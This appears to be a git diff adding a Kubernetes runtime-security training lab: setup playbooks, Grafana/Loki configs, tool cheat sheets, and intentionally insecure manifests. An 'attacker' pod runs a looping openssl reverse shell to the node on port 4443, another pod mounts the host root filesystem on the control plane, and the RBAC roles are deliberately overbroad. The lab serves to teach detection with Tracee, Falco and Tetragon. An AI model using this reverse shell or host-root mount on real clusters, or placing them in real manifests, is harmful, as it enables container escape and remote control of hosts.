+**If viewing on GitHub, you can navigate using the table of contents button in the top left next to the line count.**
+
+## Using Vi - useful shortcuts for the lab.
+
+Arrow keys to navigate cursor
+
+`i` to enter insert mode and edit contents.
+When you're in insert mode, you'll see in the bottom left hand corner that this is happening:
+
+
+
+
+`[esc]` to exit insert mode once changes are made.
+
+`u` outside insert mode to undo a change.
+
+`dd` to remove a line outside of insert mode.
+
+`:` to bring up the vi command line outside of insert mode.
+
+`:wq` to save and quit.
+
+`:q!` to exit without changes.
+
+## Troubleshooting - list of error messages and what to do:
+
+**none of the commands work without sudo**
+
+```
+sudo usermod -aG docker $USER
+```
+
+```
+chmod +x kubectl
+sudo mv ./kubectl /usr/local/bin/kubectl
+```
+
+**i'm stuck in my container and i can't control+c exit**
+
+- Open a new terminal window
+- `docker container ls`
+- Find the stuck container
+- `docker stop $containerID` # just the first couple of characters will do, ie `docker stop ac29`
+
+**kubectl commands don't work**
+
+Running a command with kubectl, and you see this:
+"the connection to the server localhost:8080 was refused - did you specify the right host or port?"
+
+Your kubeconfig has been blown away.
+
+```
+kind get kubeconfig --name lab > .kube/config
+```
+
+or
+
+```
+kubectl config use-context kind-lab
+```
+
+**HTTP endpoint (Pipedream) isn't receiving requests**
+
+- Make sure you copied the correct endpoint URL from Pipedream (not the dashboard URL)
+- The URL should look like `https://eo*.m.pipedream.net`
+- Verify the URL is set correctly in your Dockerfile's `ENV URL` line
+
+**`ESC` Keymapping to escape vim in the google console web browser is not working**
+
+Map the escape key to another key combination
+i.e
+`:imap jj :` format in the basic-auth flag above.
+
+## Supply Chain Tools Quick Reference
+
+**cosign** - Image signing and verification
+```
+# Generate key pair
+cosign generate-key-pair
+
+# Sign an image (requires push access to registry)
+cosign sign --key cosign.key
+
+# Verify an image signature
+cosign verify --key cosign.pub
+```
+
+**crane** - Container registry interactions
+```
+# View image manifest
+crane manifest | jq
+
+# List tags
+crane ls
+
+# Get image digest (immutable reference)
+crane digest
+
+# Export image filesystem
+crane export output.tar
+```
+
+**syft** - SBOM generation
+```
+# Generate SBOM for an image
+syft
+
+# Output as SPDX JSON
+syft -o spdx-json
+
+# Output as CycloneDX
+syft -o cyclonedx-json
+```
+
+**grype** - Vulnerability scanning
+```
+# Scan an image
+grype
+
+# Scan with SBOM input
+grype sbom:sbom.json
+
+# Fail on critical vulns (useful in CI)
+grype --fail-on critical
+
+# Only show fixable vulns
+grype --only-fixed
+```
+
+## Runtime Security Tools Quick Reference
+
+**Tracee**
+```
+# Check Tracee pods
+kubectl get pods -n tracee-system
+
+# View Tracee events
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=50
+
+# Run standalone Docker Tracee
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged \
+ -v /etc/os-release:/etc/os-release-host:ro \
+ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
+ aquasec/tracee:latest
+```
+
+**Falco**
+```
+# Check Falco pods
+kubectl get pods -n falco-system
+
+# View Falco alerts
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=50
+
+# Access Falcosidekick UI
+kubectl port-forward svc/falco-falcosidekick-ui -n falco-system 2802:2802
+```
+
+**Tetragon**
+```
+# Check Tetragon pods
+kubectl get pods -n tetragon
+
+# View Tetragon events
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=50
+
+# List TracingPolicies
+kubectl get tracingpolicies
+```
+
+## Grafana Loki Queries
+
+**Tracee events:**
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+
+**Falco events:**
+```
+{namespace="falco-system"} | json | line_format "{{.log}}"
+```
+
+**Tetragon events:**
+```
+{namespace="tetragon"} | json | line_format "{{.log}}"
+```
+
+## Version Reference
+
+| Component | Version |
+|-----------|---------|
+| Kubernetes | v1.31.4 |
+| kind | v0.27.0 |
+| Helm | v3.16.4 |
+| kubectl | v1.31.4 |
+| cosign | v2.4.1 |
+| crane | v0.20.2 |
+| syft | v1.18.1 |
+| grype | v0.85.0 |
+| Tracee | 0.24.0 |
diff --git a/current/grafana/tracee-dashboard.json b/current/grafana/tracee-dashboard.json
new file mode 100644
index 0000000..47d2e51
--- /dev/null
+++ b/current/grafana/tracee-dashboard.json
@@ -0,0 +1,172 @@
+{
+ "annotations": {
+ "list": [
+ {
+ "builtIn": 1,
+ "datasource": {
+ "type": "grafana",
+ "uid": "-- Grafana --"
+ },
+ "enable": true,
+ "hide": true,
+ "iconColor": "rgba(0, 211, 255, 1)",
+ "name": "Annotations & Alerts",
+ "type": "dashboard"
+ }
+ ]
+ },
+ "editable": true,
+ "fiscalYearStartMonth": 0,
+ "graphTooltip": 0,
+ "id": 29,
+ "links": [],
+ "liveNow": false,
+ "panels": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "gridPos": {
+ "h": 8,
+ "w": 12,
+ "x": 0,
+ "y": 0
+ },
+ "id": 3,
+ "options": {
+ "dedupStrategy": "none",
+ "enableLogDetails": true,
+ "prettifyLogMessage": false,
+ "showCommonLabels": false,
+ "showLabels": false,
+ "showTime": false,
+ "sortOrder": "Descending",
+ "wrapLogMessage": false
+ },
+ "targets": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "editorMode": "builder",
+ "expr": "{namespace=\"tracee-system\"} |= `matchedPolicies` != `sshd` | json | line_format `\"{{.log}}\"`",
+ "key": "Q-1624ec1f-ad81-496f-81c4-20697b2d94f1-0",
+ "queryType": "range",
+ "refId": "A"
+ }
+ ],
+ "title": "Tracee Events",
+ "type": "logs"
+ },
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "fieldConfig": {
+ "defaults": {
+ "color": {
+ "mode": "palette-classic"
+ },
+ "custom": {
+ "axisCenteredZero": false,
+ "axisColorMode": "text",
+ "axisLabel": "",
+ "axisPlacement": "auto",
+ "barAlignment": 0,
+ "drawStyle": "line",
+ "fillOpacity": 0,
+ "gradientMode": "none",
+ "hideFrom": {
+ "legend": false,
+ "tooltip": false,
+ "viz": false
+ },
+ "lineInterpolation": "linear",
+ "lineWidth": 1,
+ "pointSize": 5,
+ "scaleDistribution": {
+ "type": "linear"
+ },
+ "showPoints": "auto",
+ "spanNulls": false,
+ "stacking": {
+ "group": "A",
+ "mode": "none"
+ },
+ "thresholdsStyle": {
+ "mode": "off"
+ }
+ },
+ "mappings": [],
+ "thresholds": {
+ "mode": "absolute",
+ "steps": [
+ {
+ "color": "green",
+ "value": null
+ },
+ {
+ "color": "red",
+ "value": 80
+ }
+ ]
+ }
+ },
+ "overrides": []
+ },
+ "gridPos": {
+ "h": 8,
+ "w": 12,
+ "x": 0,
+ "y": 8
+ },
+ "id": 2,
+ "options": {
+ "legend": {
+ "calcs": [],
+ "displayMode": "list",
+ "placement": "bottom",
+ "showLegend": true
+ },
+ "tooltip": {
+ "mode": "single",
+ "sort": "none"
+ }
+ },
+ "targets": [
+ {
+ "datasource": {
+ "type": "loki",
+ "uid": "a3fda37a-4998-4161-ae3c-4d44fc0cec38"
+ },
+ "editorMode": "builder",
+ "expr": "{app=\"tracee\"} | json | __error__=``",
+ "queryType": "range",
+ "refId": "A"
+ }
+ ],
+ "title": "Panel Title",
+ "type": "timeseries"
+ }
+ ],
+ "refresh": "",
+ "schemaVersion": 38,
+ "style": "dark",
+ "tags": [],
+ "templating": {
+ "list": []
+ },
+ "time": {
+ "from": "now-6h",
+ "to": "now"
+ },
+ "timepicker": {},
+ "timezone": "",
+ "title": "Tracee WIP",
+ "uid": "f8cc421a-74b2-4ca4-ba83-201e1955a439",
+ "version": 7,
+ "weekStart": ""
+}
\ No newline at end of file
diff --git a/current/helm-config/grafana-config.yaml b/current/helm-config/grafana-config.yaml
new file mode 100644
index 0000000..17c1ed6
--- /dev/null
+++ b/current/helm-config/grafana-config.yaml
@@ -0,0 +1,15 @@
+prometheus:
+ prometheusSpec:
+ serviceMonitorSelectorNilUsesHelmValues: false
+ serviceMonitorSelector: {}
+ serviceMonitorNamespaceSelector: {}
+
+grafana:
+ sidecar:
+ datasources:
+ defaultDatasourceEnabled: true
+ additionalDataSources:
+ # Loki monolithic mode service name (replaces loki-distributed)
+ - name: Loki
+ type: loki
+ url: http://loki.monitoring:3100
diff --git a/current/helm-config/promtail-config.yaml b/current/helm-config/promtail-config.yaml
new file mode 100644
index 0000000..a3678f9
--- /dev/null
+++ b/current/helm-config/promtail-config.yaml
@@ -0,0 +1,5 @@
+config:
+ serverPort: 8080
+ clients:
+ # Loki monolithic mode endpoint (replaces loki-distributed gateway)
+ - url: http://loki.monitoring:3100/loki/api/v1/push
diff --git a/current/image.png b/current/image.png
new file mode 100644
index 0000000..bd03a54
Binary files /dev/null and b/current/image.png differ
diff --git a/current/k8s-ansible-setup.yml b/current/k8s-ansible-setup.yml
new file mode 100644
index 0000000..38c9005
--- /dev/null
+++ b/current/k8s-ansible-setup.yml
@@ -0,0 +1,170 @@
+---
+- hosts: localhost
+ name: Setup Kubernetes cluster
+ gather_facts: false
+ tasks:
+ - name: Create namespaces
+ ansible.builtin.command: kubectl apply -f k8s-manifests/namespaces.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create ClusterRoles
+ ansible.builtin.command: kubectl apply -f k8s-manifests/clusterroles.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Roles
+ ansible.builtin.command: kubectl apply -f k8s-manifests/roles.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Service Accounts
+ ansible.builtin.command: kubectl apply -f k8s-manifests/serviceaccounts.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create ClusterRoleBindings
+ ansible.builtin.command: kubectl apply -f k8s-manifests/clusterrolebindings.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create RoleBindings
+ ansible.builtin.command: kubectl apply -f k8s-manifests/rolebindings.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Deployments
+ ansible.builtin.command: kubectl apply -f k8s-manifests/deployments.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Pods
+ ansible.builtin.command: kubectl apply -f k8s-manifests/pods.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ - name: Create Services
+ ansible.builtin.command: kubectl apply -f k8s-manifests/services.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ # --- Prometheus + Grafana (kube-prometheus-stack) ---
+ - name: Install prometheus for kind clusters
+ ansible.builtin.command:
+ cmd: |
+ helm install kind-prometheus prometheus-community/kube-prometheus-stack
+ --namespace monitoring
+ --set prometheus.service.nodePort=30000
+ --set prometheus.service.type=NodePort
+ --set grafana.service.nodePort=31000
+ --set grafana.service.type=NodePort
+ --set grafana.adminPassword=prom-operator
+ --set alertmanager.service.nodePort=32000
+ --set alertmanager.service.type=NodePort
+ --set prometheus-node-exporter.service.nodePort=32001
+ --set prometheus-node-exporter.service.type=NodePort
+ --values helm-config/grafana-config.yaml
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Promtail (log shipping to Loki) ---
+ - name: Install promtail
+ ansible.builtin.command:
+ cmd: |
+ helm upgrade
+ --install promtail grafana/promtail
+ --values helm-config/promtail-config.yaml
+ --namespace monitoring
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Loki (monolithic mode - replaces deprecated loki-distributed) ---
+ - name: Install loki (monolithic mode)
+ ansible.builtin.command:
+ cmd: |
+ helm upgrade
+ --install loki grafana/loki
+ --namespace monitoring
+ --set loki.commonConfig.replication_factor=1
+ --set loki.storage.type=filesystem
+ --set singleBinary.replicas=1
+ --set loki.auth_enabled=false
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Secrets ---
+ - name: Add secrets
+ ansible.builtin.command:
+ cmd: |
+ kubectl create -f k8s-manifests/secrets.yaml
+ register: kubectl_run
+ changed_when:
+ - "'created' in kubectl_run.stdout"
+
+ # --- Developer context setup ---
+ - name: Setup developer context for later
+ ansible.builtin.shell: |
+ set -o pipefail
+ SECRET_NAME="developer-user-token"
+ TOKEN=$(kubectl get secret ${SECRET_NAME} --namespace=pls-dont-hack-me -o jsonpath='{$.data.token}' | base64 -d | sed $'s/$/\\\n/g')
+ kubectl config set-credentials developer --token=${TOKEN}
+ kubectl config set-context developer@kind-lab --user=developer --cluster=kind-lab --namespace=pls-dont-hack-me
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ changed_when:
+ - "'created' in cmd_output.stdout"
+
+ # --- Tracee (updated from 0.19.0 to 0.24.0) ---
+ - name: Install tracee
+ ansible.builtin.command:
+ cmd: |
+ helm install tracee aqua/tracee
+ --namespace tracee-system
+ --set hostPID=true
+ --version 0.24.0
+ --set nodeSelector.role=control-plane
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Falco (new - complementary runtime detection) ---
+ - name: Install falco
+ ansible.builtin.command:
+ cmd: |
+ helm install falco falcosecurity/falco
+ --namespace falco-system
+ --create-namespace
+ --set falcosidekick.enabled=true
+ --set falcosidekick.webui.enabled=true
+ --set driver.kind=ebpf
+ --set collectors.containerd.enabled=true
+ --set collectors.containerd.socket=/run/containerd/containerd.sock
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
+
+ # --- Tetragon (new - Cilium eBPF security observability) ---
+ - name: Install tetragon
+ ansible.builtin.command:
+ cmd: |
+ helm install tetragon cilium/tetragon
+ --namespace tetragon
+ --create-namespace
+ --set tetragon.enableProcessCred=true
+ --set tetragon.enableProcessNs=true
+ register: helm_install
+ changed_when:
+ - "'STATUS: deployed' in helm_install.stdout"
diff --git a/current/k8s-manifests/attacker-pod.yaml b/current/k8s-manifests/attacker-pod.yaml
new file mode 100644
index 0000000..e08a41f
--- /dev/null
+++ b/current/k8s-manifests/attacker-pod.yaml
@@ -0,0 +1,33 @@
+apiVersion: v1
+kind: Pod
+metadata:
+ name: malicious-pod
+ labels:
+ app: malicious
+spec:
+ containers:
+ - name: malicious-container
+ image: ubuntu:22.04
+ env:
+ - name: NODE_IP
+ valueFrom:
+ fieldRef:
+ fieldPath: status.hostIP
+ command: ["/bin/bash"]
+ args:
+ - "-c"
+ - |
+ apt-get update -qq && apt-get install -y -qq openssl strace > /dev/null 2>&1
+ while true; do
+ echo "Simulating reverse shell to attacker c2 at 4443"
+ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $NODE_IP:4443 > /tmp/s; rm /tmp/s
+ strace ls
+ sleep 90
+ done
+ resources:
+ limits:
+ cpu: "1"
+ memory: "512Mi"
+ requests:
+ cpu: "0.5"
+ memory: "256Mi"
diff --git a/current/k8s-manifests/clusterrolebindings.yaml b/current/k8s-manifests/clusterrolebindings.yaml
new file mode 100644
index 0000000..acb2ad8
--- /dev/null
+++ b/current/k8s-manifests/clusterrolebindings.yaml
@@ -0,0 +1,26 @@
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+ name: read-secrets-clusterrolebinding
+subjects:
+- kind: ServiceAccount
+ name: read-secrets
+ namespace: pls-dont-hack-me
+roleRef:
+ kind: ClusterRole
+ name: secret-reader
+ apiGroup: rbac.authorization.k8s.io
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+ name: security-admin-clusterrolebinding
+subjects:
+- kind: ServiceAccount
+ name: security-svc
+ namespace: tracee-system
+roleRef:
+ kind: ClusterRole
+ name: security-admin-role
+ apiGroup: rbac.authorization.k8s.io
\ No newline at end of file
diff --git a/current/k8s-manifests/clusterroles.yaml b/current/k8s-manifests/clusterroles.yaml
new file mode 100644
index 0000000..c5fe1c1
--- /dev/null
+++ b/current/k8s-manifests/clusterroles.yaml
@@ -0,0 +1,20 @@
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+ # "namespace" omitted since ClusterRoles are not namespaced
+ name: secret-reader
+rules:
+- apiGroups: [""]
+ resources: ["secrets"]
+ verbs: ["get", "watch", "list"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+ # "namespace" omitted since ClusterRoles are not namespaced
+ name: security-admin-role
+rules:
+- apiGroups: [""]
+ resources: ["*"]
+ verbs: ["*"]
diff --git a/current/k8s-manifests/configmaps.yaml b/current/k8s-manifests/configmaps.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/daemonsets.yaml b/current/k8s-manifests/daemonsets.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/deployments.yaml b/current/k8s-manifests/deployments.yaml
new file mode 100644
index 0000000..3e07de3
--- /dev/null
+++ b/current/k8s-manifests/deployments.yaml
@@ -0,0 +1,49 @@
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: myapp
+ namespace: pls-dont-hack-me
+spec:
+ selector:
+ matchLabels:
+ app: myapp
+ template:
+ metadata:
+ labels:
+ app: myapp
+ spec:
+ containers:
+ - name: myapp
+ image: ubuntu:22.04
+ command: ["/bin/sleep", "infinity"]
+ resources:
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 80
+ serviceAccountName: read-secrets
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: juice-shop
+spec:
+ selector:
+ matchLabels:
+ app: juice-shop
+ template:
+ metadata:
+ labels:
+ app: juice-shop
+ spec:
+ containers:
+ - name: juice-shop
+ image: bkimminich/juice-shop
+ resources:
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 3000
diff --git a/current/k8s-manifests/evilpod.yaml b/current/k8s-manifests/evilpod.yaml
new file mode 100644
index 0000000..41d7a28
--- /dev/null
+++ b/current/k8s-manifests/evilpod.yaml
@@ -0,0 +1,30 @@
+---
+apiVersion: v1
+kind: Pod
+metadata:
+ name: evil-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: evil-pod
+spec:
+ containers:
+ - name: evil-pod
+ image: ubuntu:22.04
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ volumeMounts: # Mount that host path volume below, under /controlplane inside the pod's container
+ - mountPath: /controlplane
+ name: noderoot
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
+ nodeName: lab-control-plane # Forces pod to run on control-plane node
+ volumes:
+ - name: noderoot # Creates a volume that mounts the host's root directory
+ hostPath:
+ path: /
+
\ No newline at end of file
diff --git a/current/k8s-manifests/imds-demo-pod.yaml b/current/k8s-manifests/imds-demo-pod.yaml
new file mode 100644
index 0000000..87dc7e0
--- /dev/null
+++ b/current/k8s-manifests/imds-demo-pod.yaml
@@ -0,0 +1,26 @@
+---
+# Pod for IMDS attack demonstration
+# When running on a cloud provider (AWS/GCP/Azure), this pod can query the
+# instance metadata service. In our kind lab, this demonstrates the concept
+# and the commands, even though the IMDS endpoint won't be available.
+apiVersion: v1
+kind: Pod
+metadata:
+ name: imds-attack-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: imds-attack
+ demo: cloud-native
+spec:
+ containers:
+ - name: imds-attacker
+ image: alpine/curl:8.11.1
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
diff --git a/current/k8s-manifests/ingress.yaml b/current/k8s-manifests/ingress.yaml
new file mode 100644
index 0000000..e69de29
diff --git a/current/k8s-manifests/namespaces.yaml b/current/k8s-manifests/namespaces.yaml
new file mode 100644
index 0000000..57f615d
--- /dev/null
+++ b/current/k8s-manifests/namespaces.yaml
@@ -0,0 +1,30 @@
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: pls-dont-hack-me
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: monitoring
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: tracee-system
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: alert-demo
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: falco-system
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: tetragon
\ No newline at end of file
diff --git a/current/k8s-manifests/network-policy-demo.yaml b/current/k8s-manifests/network-policy-demo.yaml
new file mode 100644
index 0000000..a3588f7
--- /dev/null
+++ b/current/k8s-manifests/network-policy-demo.yaml
@@ -0,0 +1,66 @@
+---
+# Default deny all ingress traffic in pls-dont-hack-me namespace
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: default-deny-ingress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Ingress
+---
+# Default deny all egress traffic in pls-dont-hack-me namespace
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: default-deny-egress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+---
+# Allow DNS egress (required for most pods to function)
+# This is the kind of policy that often gets added as an afterthought,
+# and can be abused for DNS exfiltration
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: allow-dns-egress
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+ egress:
+ - to:
+ - namespaceSelector: {}
+ ports:
+ - protocol: UDP
+ port: 53
+ - protocol: TCP
+ port: 53
+---
+# Pod for testing network policy enforcement and DNS exfiltration
+apiVersion: v1
+kind: Pod
+metadata:
+ name: netpol-test-pod
+ namespace: pls-dont-hack-me
+ labels:
+ app: netpol-test
+ demo: cloud-native
+spec:
+ containers:
+ - name: netpol-tester
+ image: alpine/curl:8.11.1
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
diff --git a/current/k8s-manifests/nothingallowedpod.yaml b/current/k8s-manifests/nothingallowedpod.yaml
new file mode 100644
index 0000000..9aab5ed
--- /dev/null
+++ b/current/k8s-manifests/nothingallowedpod.yaml
@@ -0,0 +1,19 @@
+apiVersion: v1
+kind: Pod
+metadata:
+ name: nothing-allowed-exec-pod
+ labels:
+ app: pentest
+spec:
+ containers:
+ - name: nothing-allowed-pod
+ image: alpine/curl:8.11.1
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
diff --git a/current/k8s-manifests/pods.yaml b/current/k8s-manifests/pods.yaml
new file mode 100644
index 0000000..6a66844
--- /dev/null
+++ b/current/k8s-manifests/pods.yaml
@@ -0,0 +1,17 @@
+---
+apiVersion: v1
+kind: Pod
+metadata:
+ name: tracee-tester
+ labels:
+ name: tracee-tester
+ namespace: alert-demo
+spec:
+ containers:
+ - name: tracee-tester
+ image: aquasec/tracee-tester:latest
+ args: ["TRC-107", "TRC-1018", "TRC-1016"]
+ resources:
+ limits:
+ memory: "128Mi"
+ cpu: "250m"
diff --git a/current/k8s-manifests/rolebindings.yaml b/current/k8s-manifests/rolebindings.yaml
new file mode 100644
index 0000000..e3b6200
--- /dev/null
+++ b/current/k8s-manifests/rolebindings.yaml
@@ -0,0 +1,28 @@
+---
+kind: RoleBinding
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: developer-developer
+ namespace: pls-dont-hack-me
+subjects:
+- kind: ServiceAccount
+ name: developer
+ namespace: pls-dont-hack-me
+roleRef:
+ apiGroup: rbac.authorization.k8s.io
+ kind: Role
+ name: developer
+---
+kind: RoleBinding
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: devops-deployment
+ namespace: pls-dont-hack-me
+subjects:
+- kind: ServiceAccount
+ name: deployment-svc
+ namespace: pls-dont-hack-me
+roleRef:
+ apiGroup: rbac.authorization.k8s.io
+ kind: Role
+ name: devops
\ No newline at end of file
diff --git a/current/k8s-manifests/roles.yaml b/current/k8s-manifests/roles.yaml
new file mode 100644
index 0000000..63f9c71
--- /dev/null
+++ b/current/k8s-manifests/roles.yaml
@@ -0,0 +1,38 @@
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ name: admin
+ namespace: pls-dont-hack-me
+rules:
+- apiGroups: ["", "extensions", "apps"]
+ resources: ["*"]
+ verbs: ["*"]
+- apiGroups: ["batch"]
+ resources:
+ - jobs
+ - cronjobs
+ verbs: ["*"]
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ namespace: pls-dont-hack-me
+ name: devops
+rules:
+- apiGroups: ["", "extensions", "apps"]
+ resources: ["deployments", "replicasets", "pods", "services", "ingresses"]
+ verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
+---
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+ namespace: pls-dont-hack-me
+ name: developer
+rules:
+- apiGroups: [""]
+ resources: ["pods", "pods/log"]
+ verbs: ["get", "list", "create"]
+- apiGroups: [""]
+ resources: ["pods/exec"]
+ verbs: ["get","create"]
\ No newline at end of file
diff --git a/current/k8s-manifests/secrets.yaml b/current/k8s-manifests/secrets.yaml
new file mode 100644
index 0000000..a760e63
--- /dev/null
+++ b/current/k8s-manifests/secrets.yaml
@@ -0,0 +1,18 @@
+---
+apiVersion: v1
+kind: Secret
+metadata:
+ name: developer-user-token
+ annotations:
+ kubernetes.io/service-account.name: developer
+ namespace: pls-dont-hack-me
+type: kubernetes.io/service-account-token
+---
+apiVersion: v1
+kind: Secret
+metadata:
+ name: security-svc-token
+ annotations:
+ kubernetes.io/service-account.name: security-svc
+ namespace: tracee-system
+type: kubernetes.io/service-account-token
\ No newline at end of file
diff --git a/current/k8s-manifests/serviceaccounts.yaml b/current/k8s-manifests/serviceaccounts.yaml
new file mode 100644
index 0000000..5e5f44c
--- /dev/null
+++ b/current/k8s-manifests/serviceaccounts.yaml
@@ -0,0 +1,24 @@
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: read-secrets
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: developer
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: deployment-svc
+ namespace: pls-dont-hack-me
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: security-svc
+ namespace: tracee-system
\ No newline at end of file
diff --git a/current/k8s-manifests/services.yaml b/current/k8s-manifests/services.yaml
new file mode 100644
index 0000000..a5885d8
--- /dev/null
+++ b/current/k8s-manifests/services.yaml
@@ -0,0 +1,17 @@
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: juice-shop-service
+ namespace: pls-dont-hack-me
+ annotations:
+ prometheus.io/scrape: 'true'
+ prometheus.io/port: '9090'
+spec:
+ selector:
+ app: juices-shop
+ type: NodePort
+ ports:
+ - port: 8080
+ nodePort: 30030
+ targetPort: 3000
diff --git a/current/k8s-manifests/supply-chain-demo.yaml b/current/k8s-manifests/supply-chain-demo.yaml
new file mode 100644
index 0000000..ceaf2c6
--- /dev/null
+++ b/current/k8s-manifests/supply-chain-demo.yaml
@@ -0,0 +1,48 @@
+---
+# Unsigned image deployment - for demonstrating admission controller enforcement
+apiVersion: v1
+kind: Pod
+metadata:
+ name: unsigned-app
+ namespace: pls-dont-hack-me
+ labels:
+ app: unsigned-app
+ demo: supply-chain
+spec:
+ containers:
+ - name: unsigned-app
+ image: ubuntu:22.04
+ command: ["/bin/sh", "-c", "--"]
+ args: ["echo 'I am an unsigned image'; while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
+---
+# Trojanized image analysis target - a known-vulnerable image for scanning demos
+apiVersion: v1
+kind: Pod
+metadata:
+ name: vuln-scan-target
+ namespace: pls-dont-hack-me
+ labels:
+ app: vuln-scan-target
+ demo: supply-chain
+spec:
+ containers:
+ - name: vuln-target
+ image: vulnerables/web-dvwa:latest
+ resources:
+ requests:
+ memory: "128Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 80
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
diff --git a/current/kind-lab-config.yaml b/current/kind-lab-config.yaml
new file mode 100644
index 0000000..39c61ce
--- /dev/null
+++ b/current/kind-lab-config.yaml
@@ -0,0 +1,15 @@
+# Lab cluster setup
+kind: Cluster
+apiVersion: kind.x-k8s.io/v1alpha4
+name: lab
+# 1 control plane node and 2 workers
+nodes:
+# All nodes use v1.31.4 image matching our target K8s version
+# the control plane node config
+- role: control-plane
+ image: kindest/node:v1.31.4
+# the two workers
+- role: worker
+ image: kindest/node:v1.31.4
+- role: worker
+ image: kindest/node:v1.31.4
diff --git a/current/lab-ansible-setup.yml b/current/lab-ansible-setup.yml
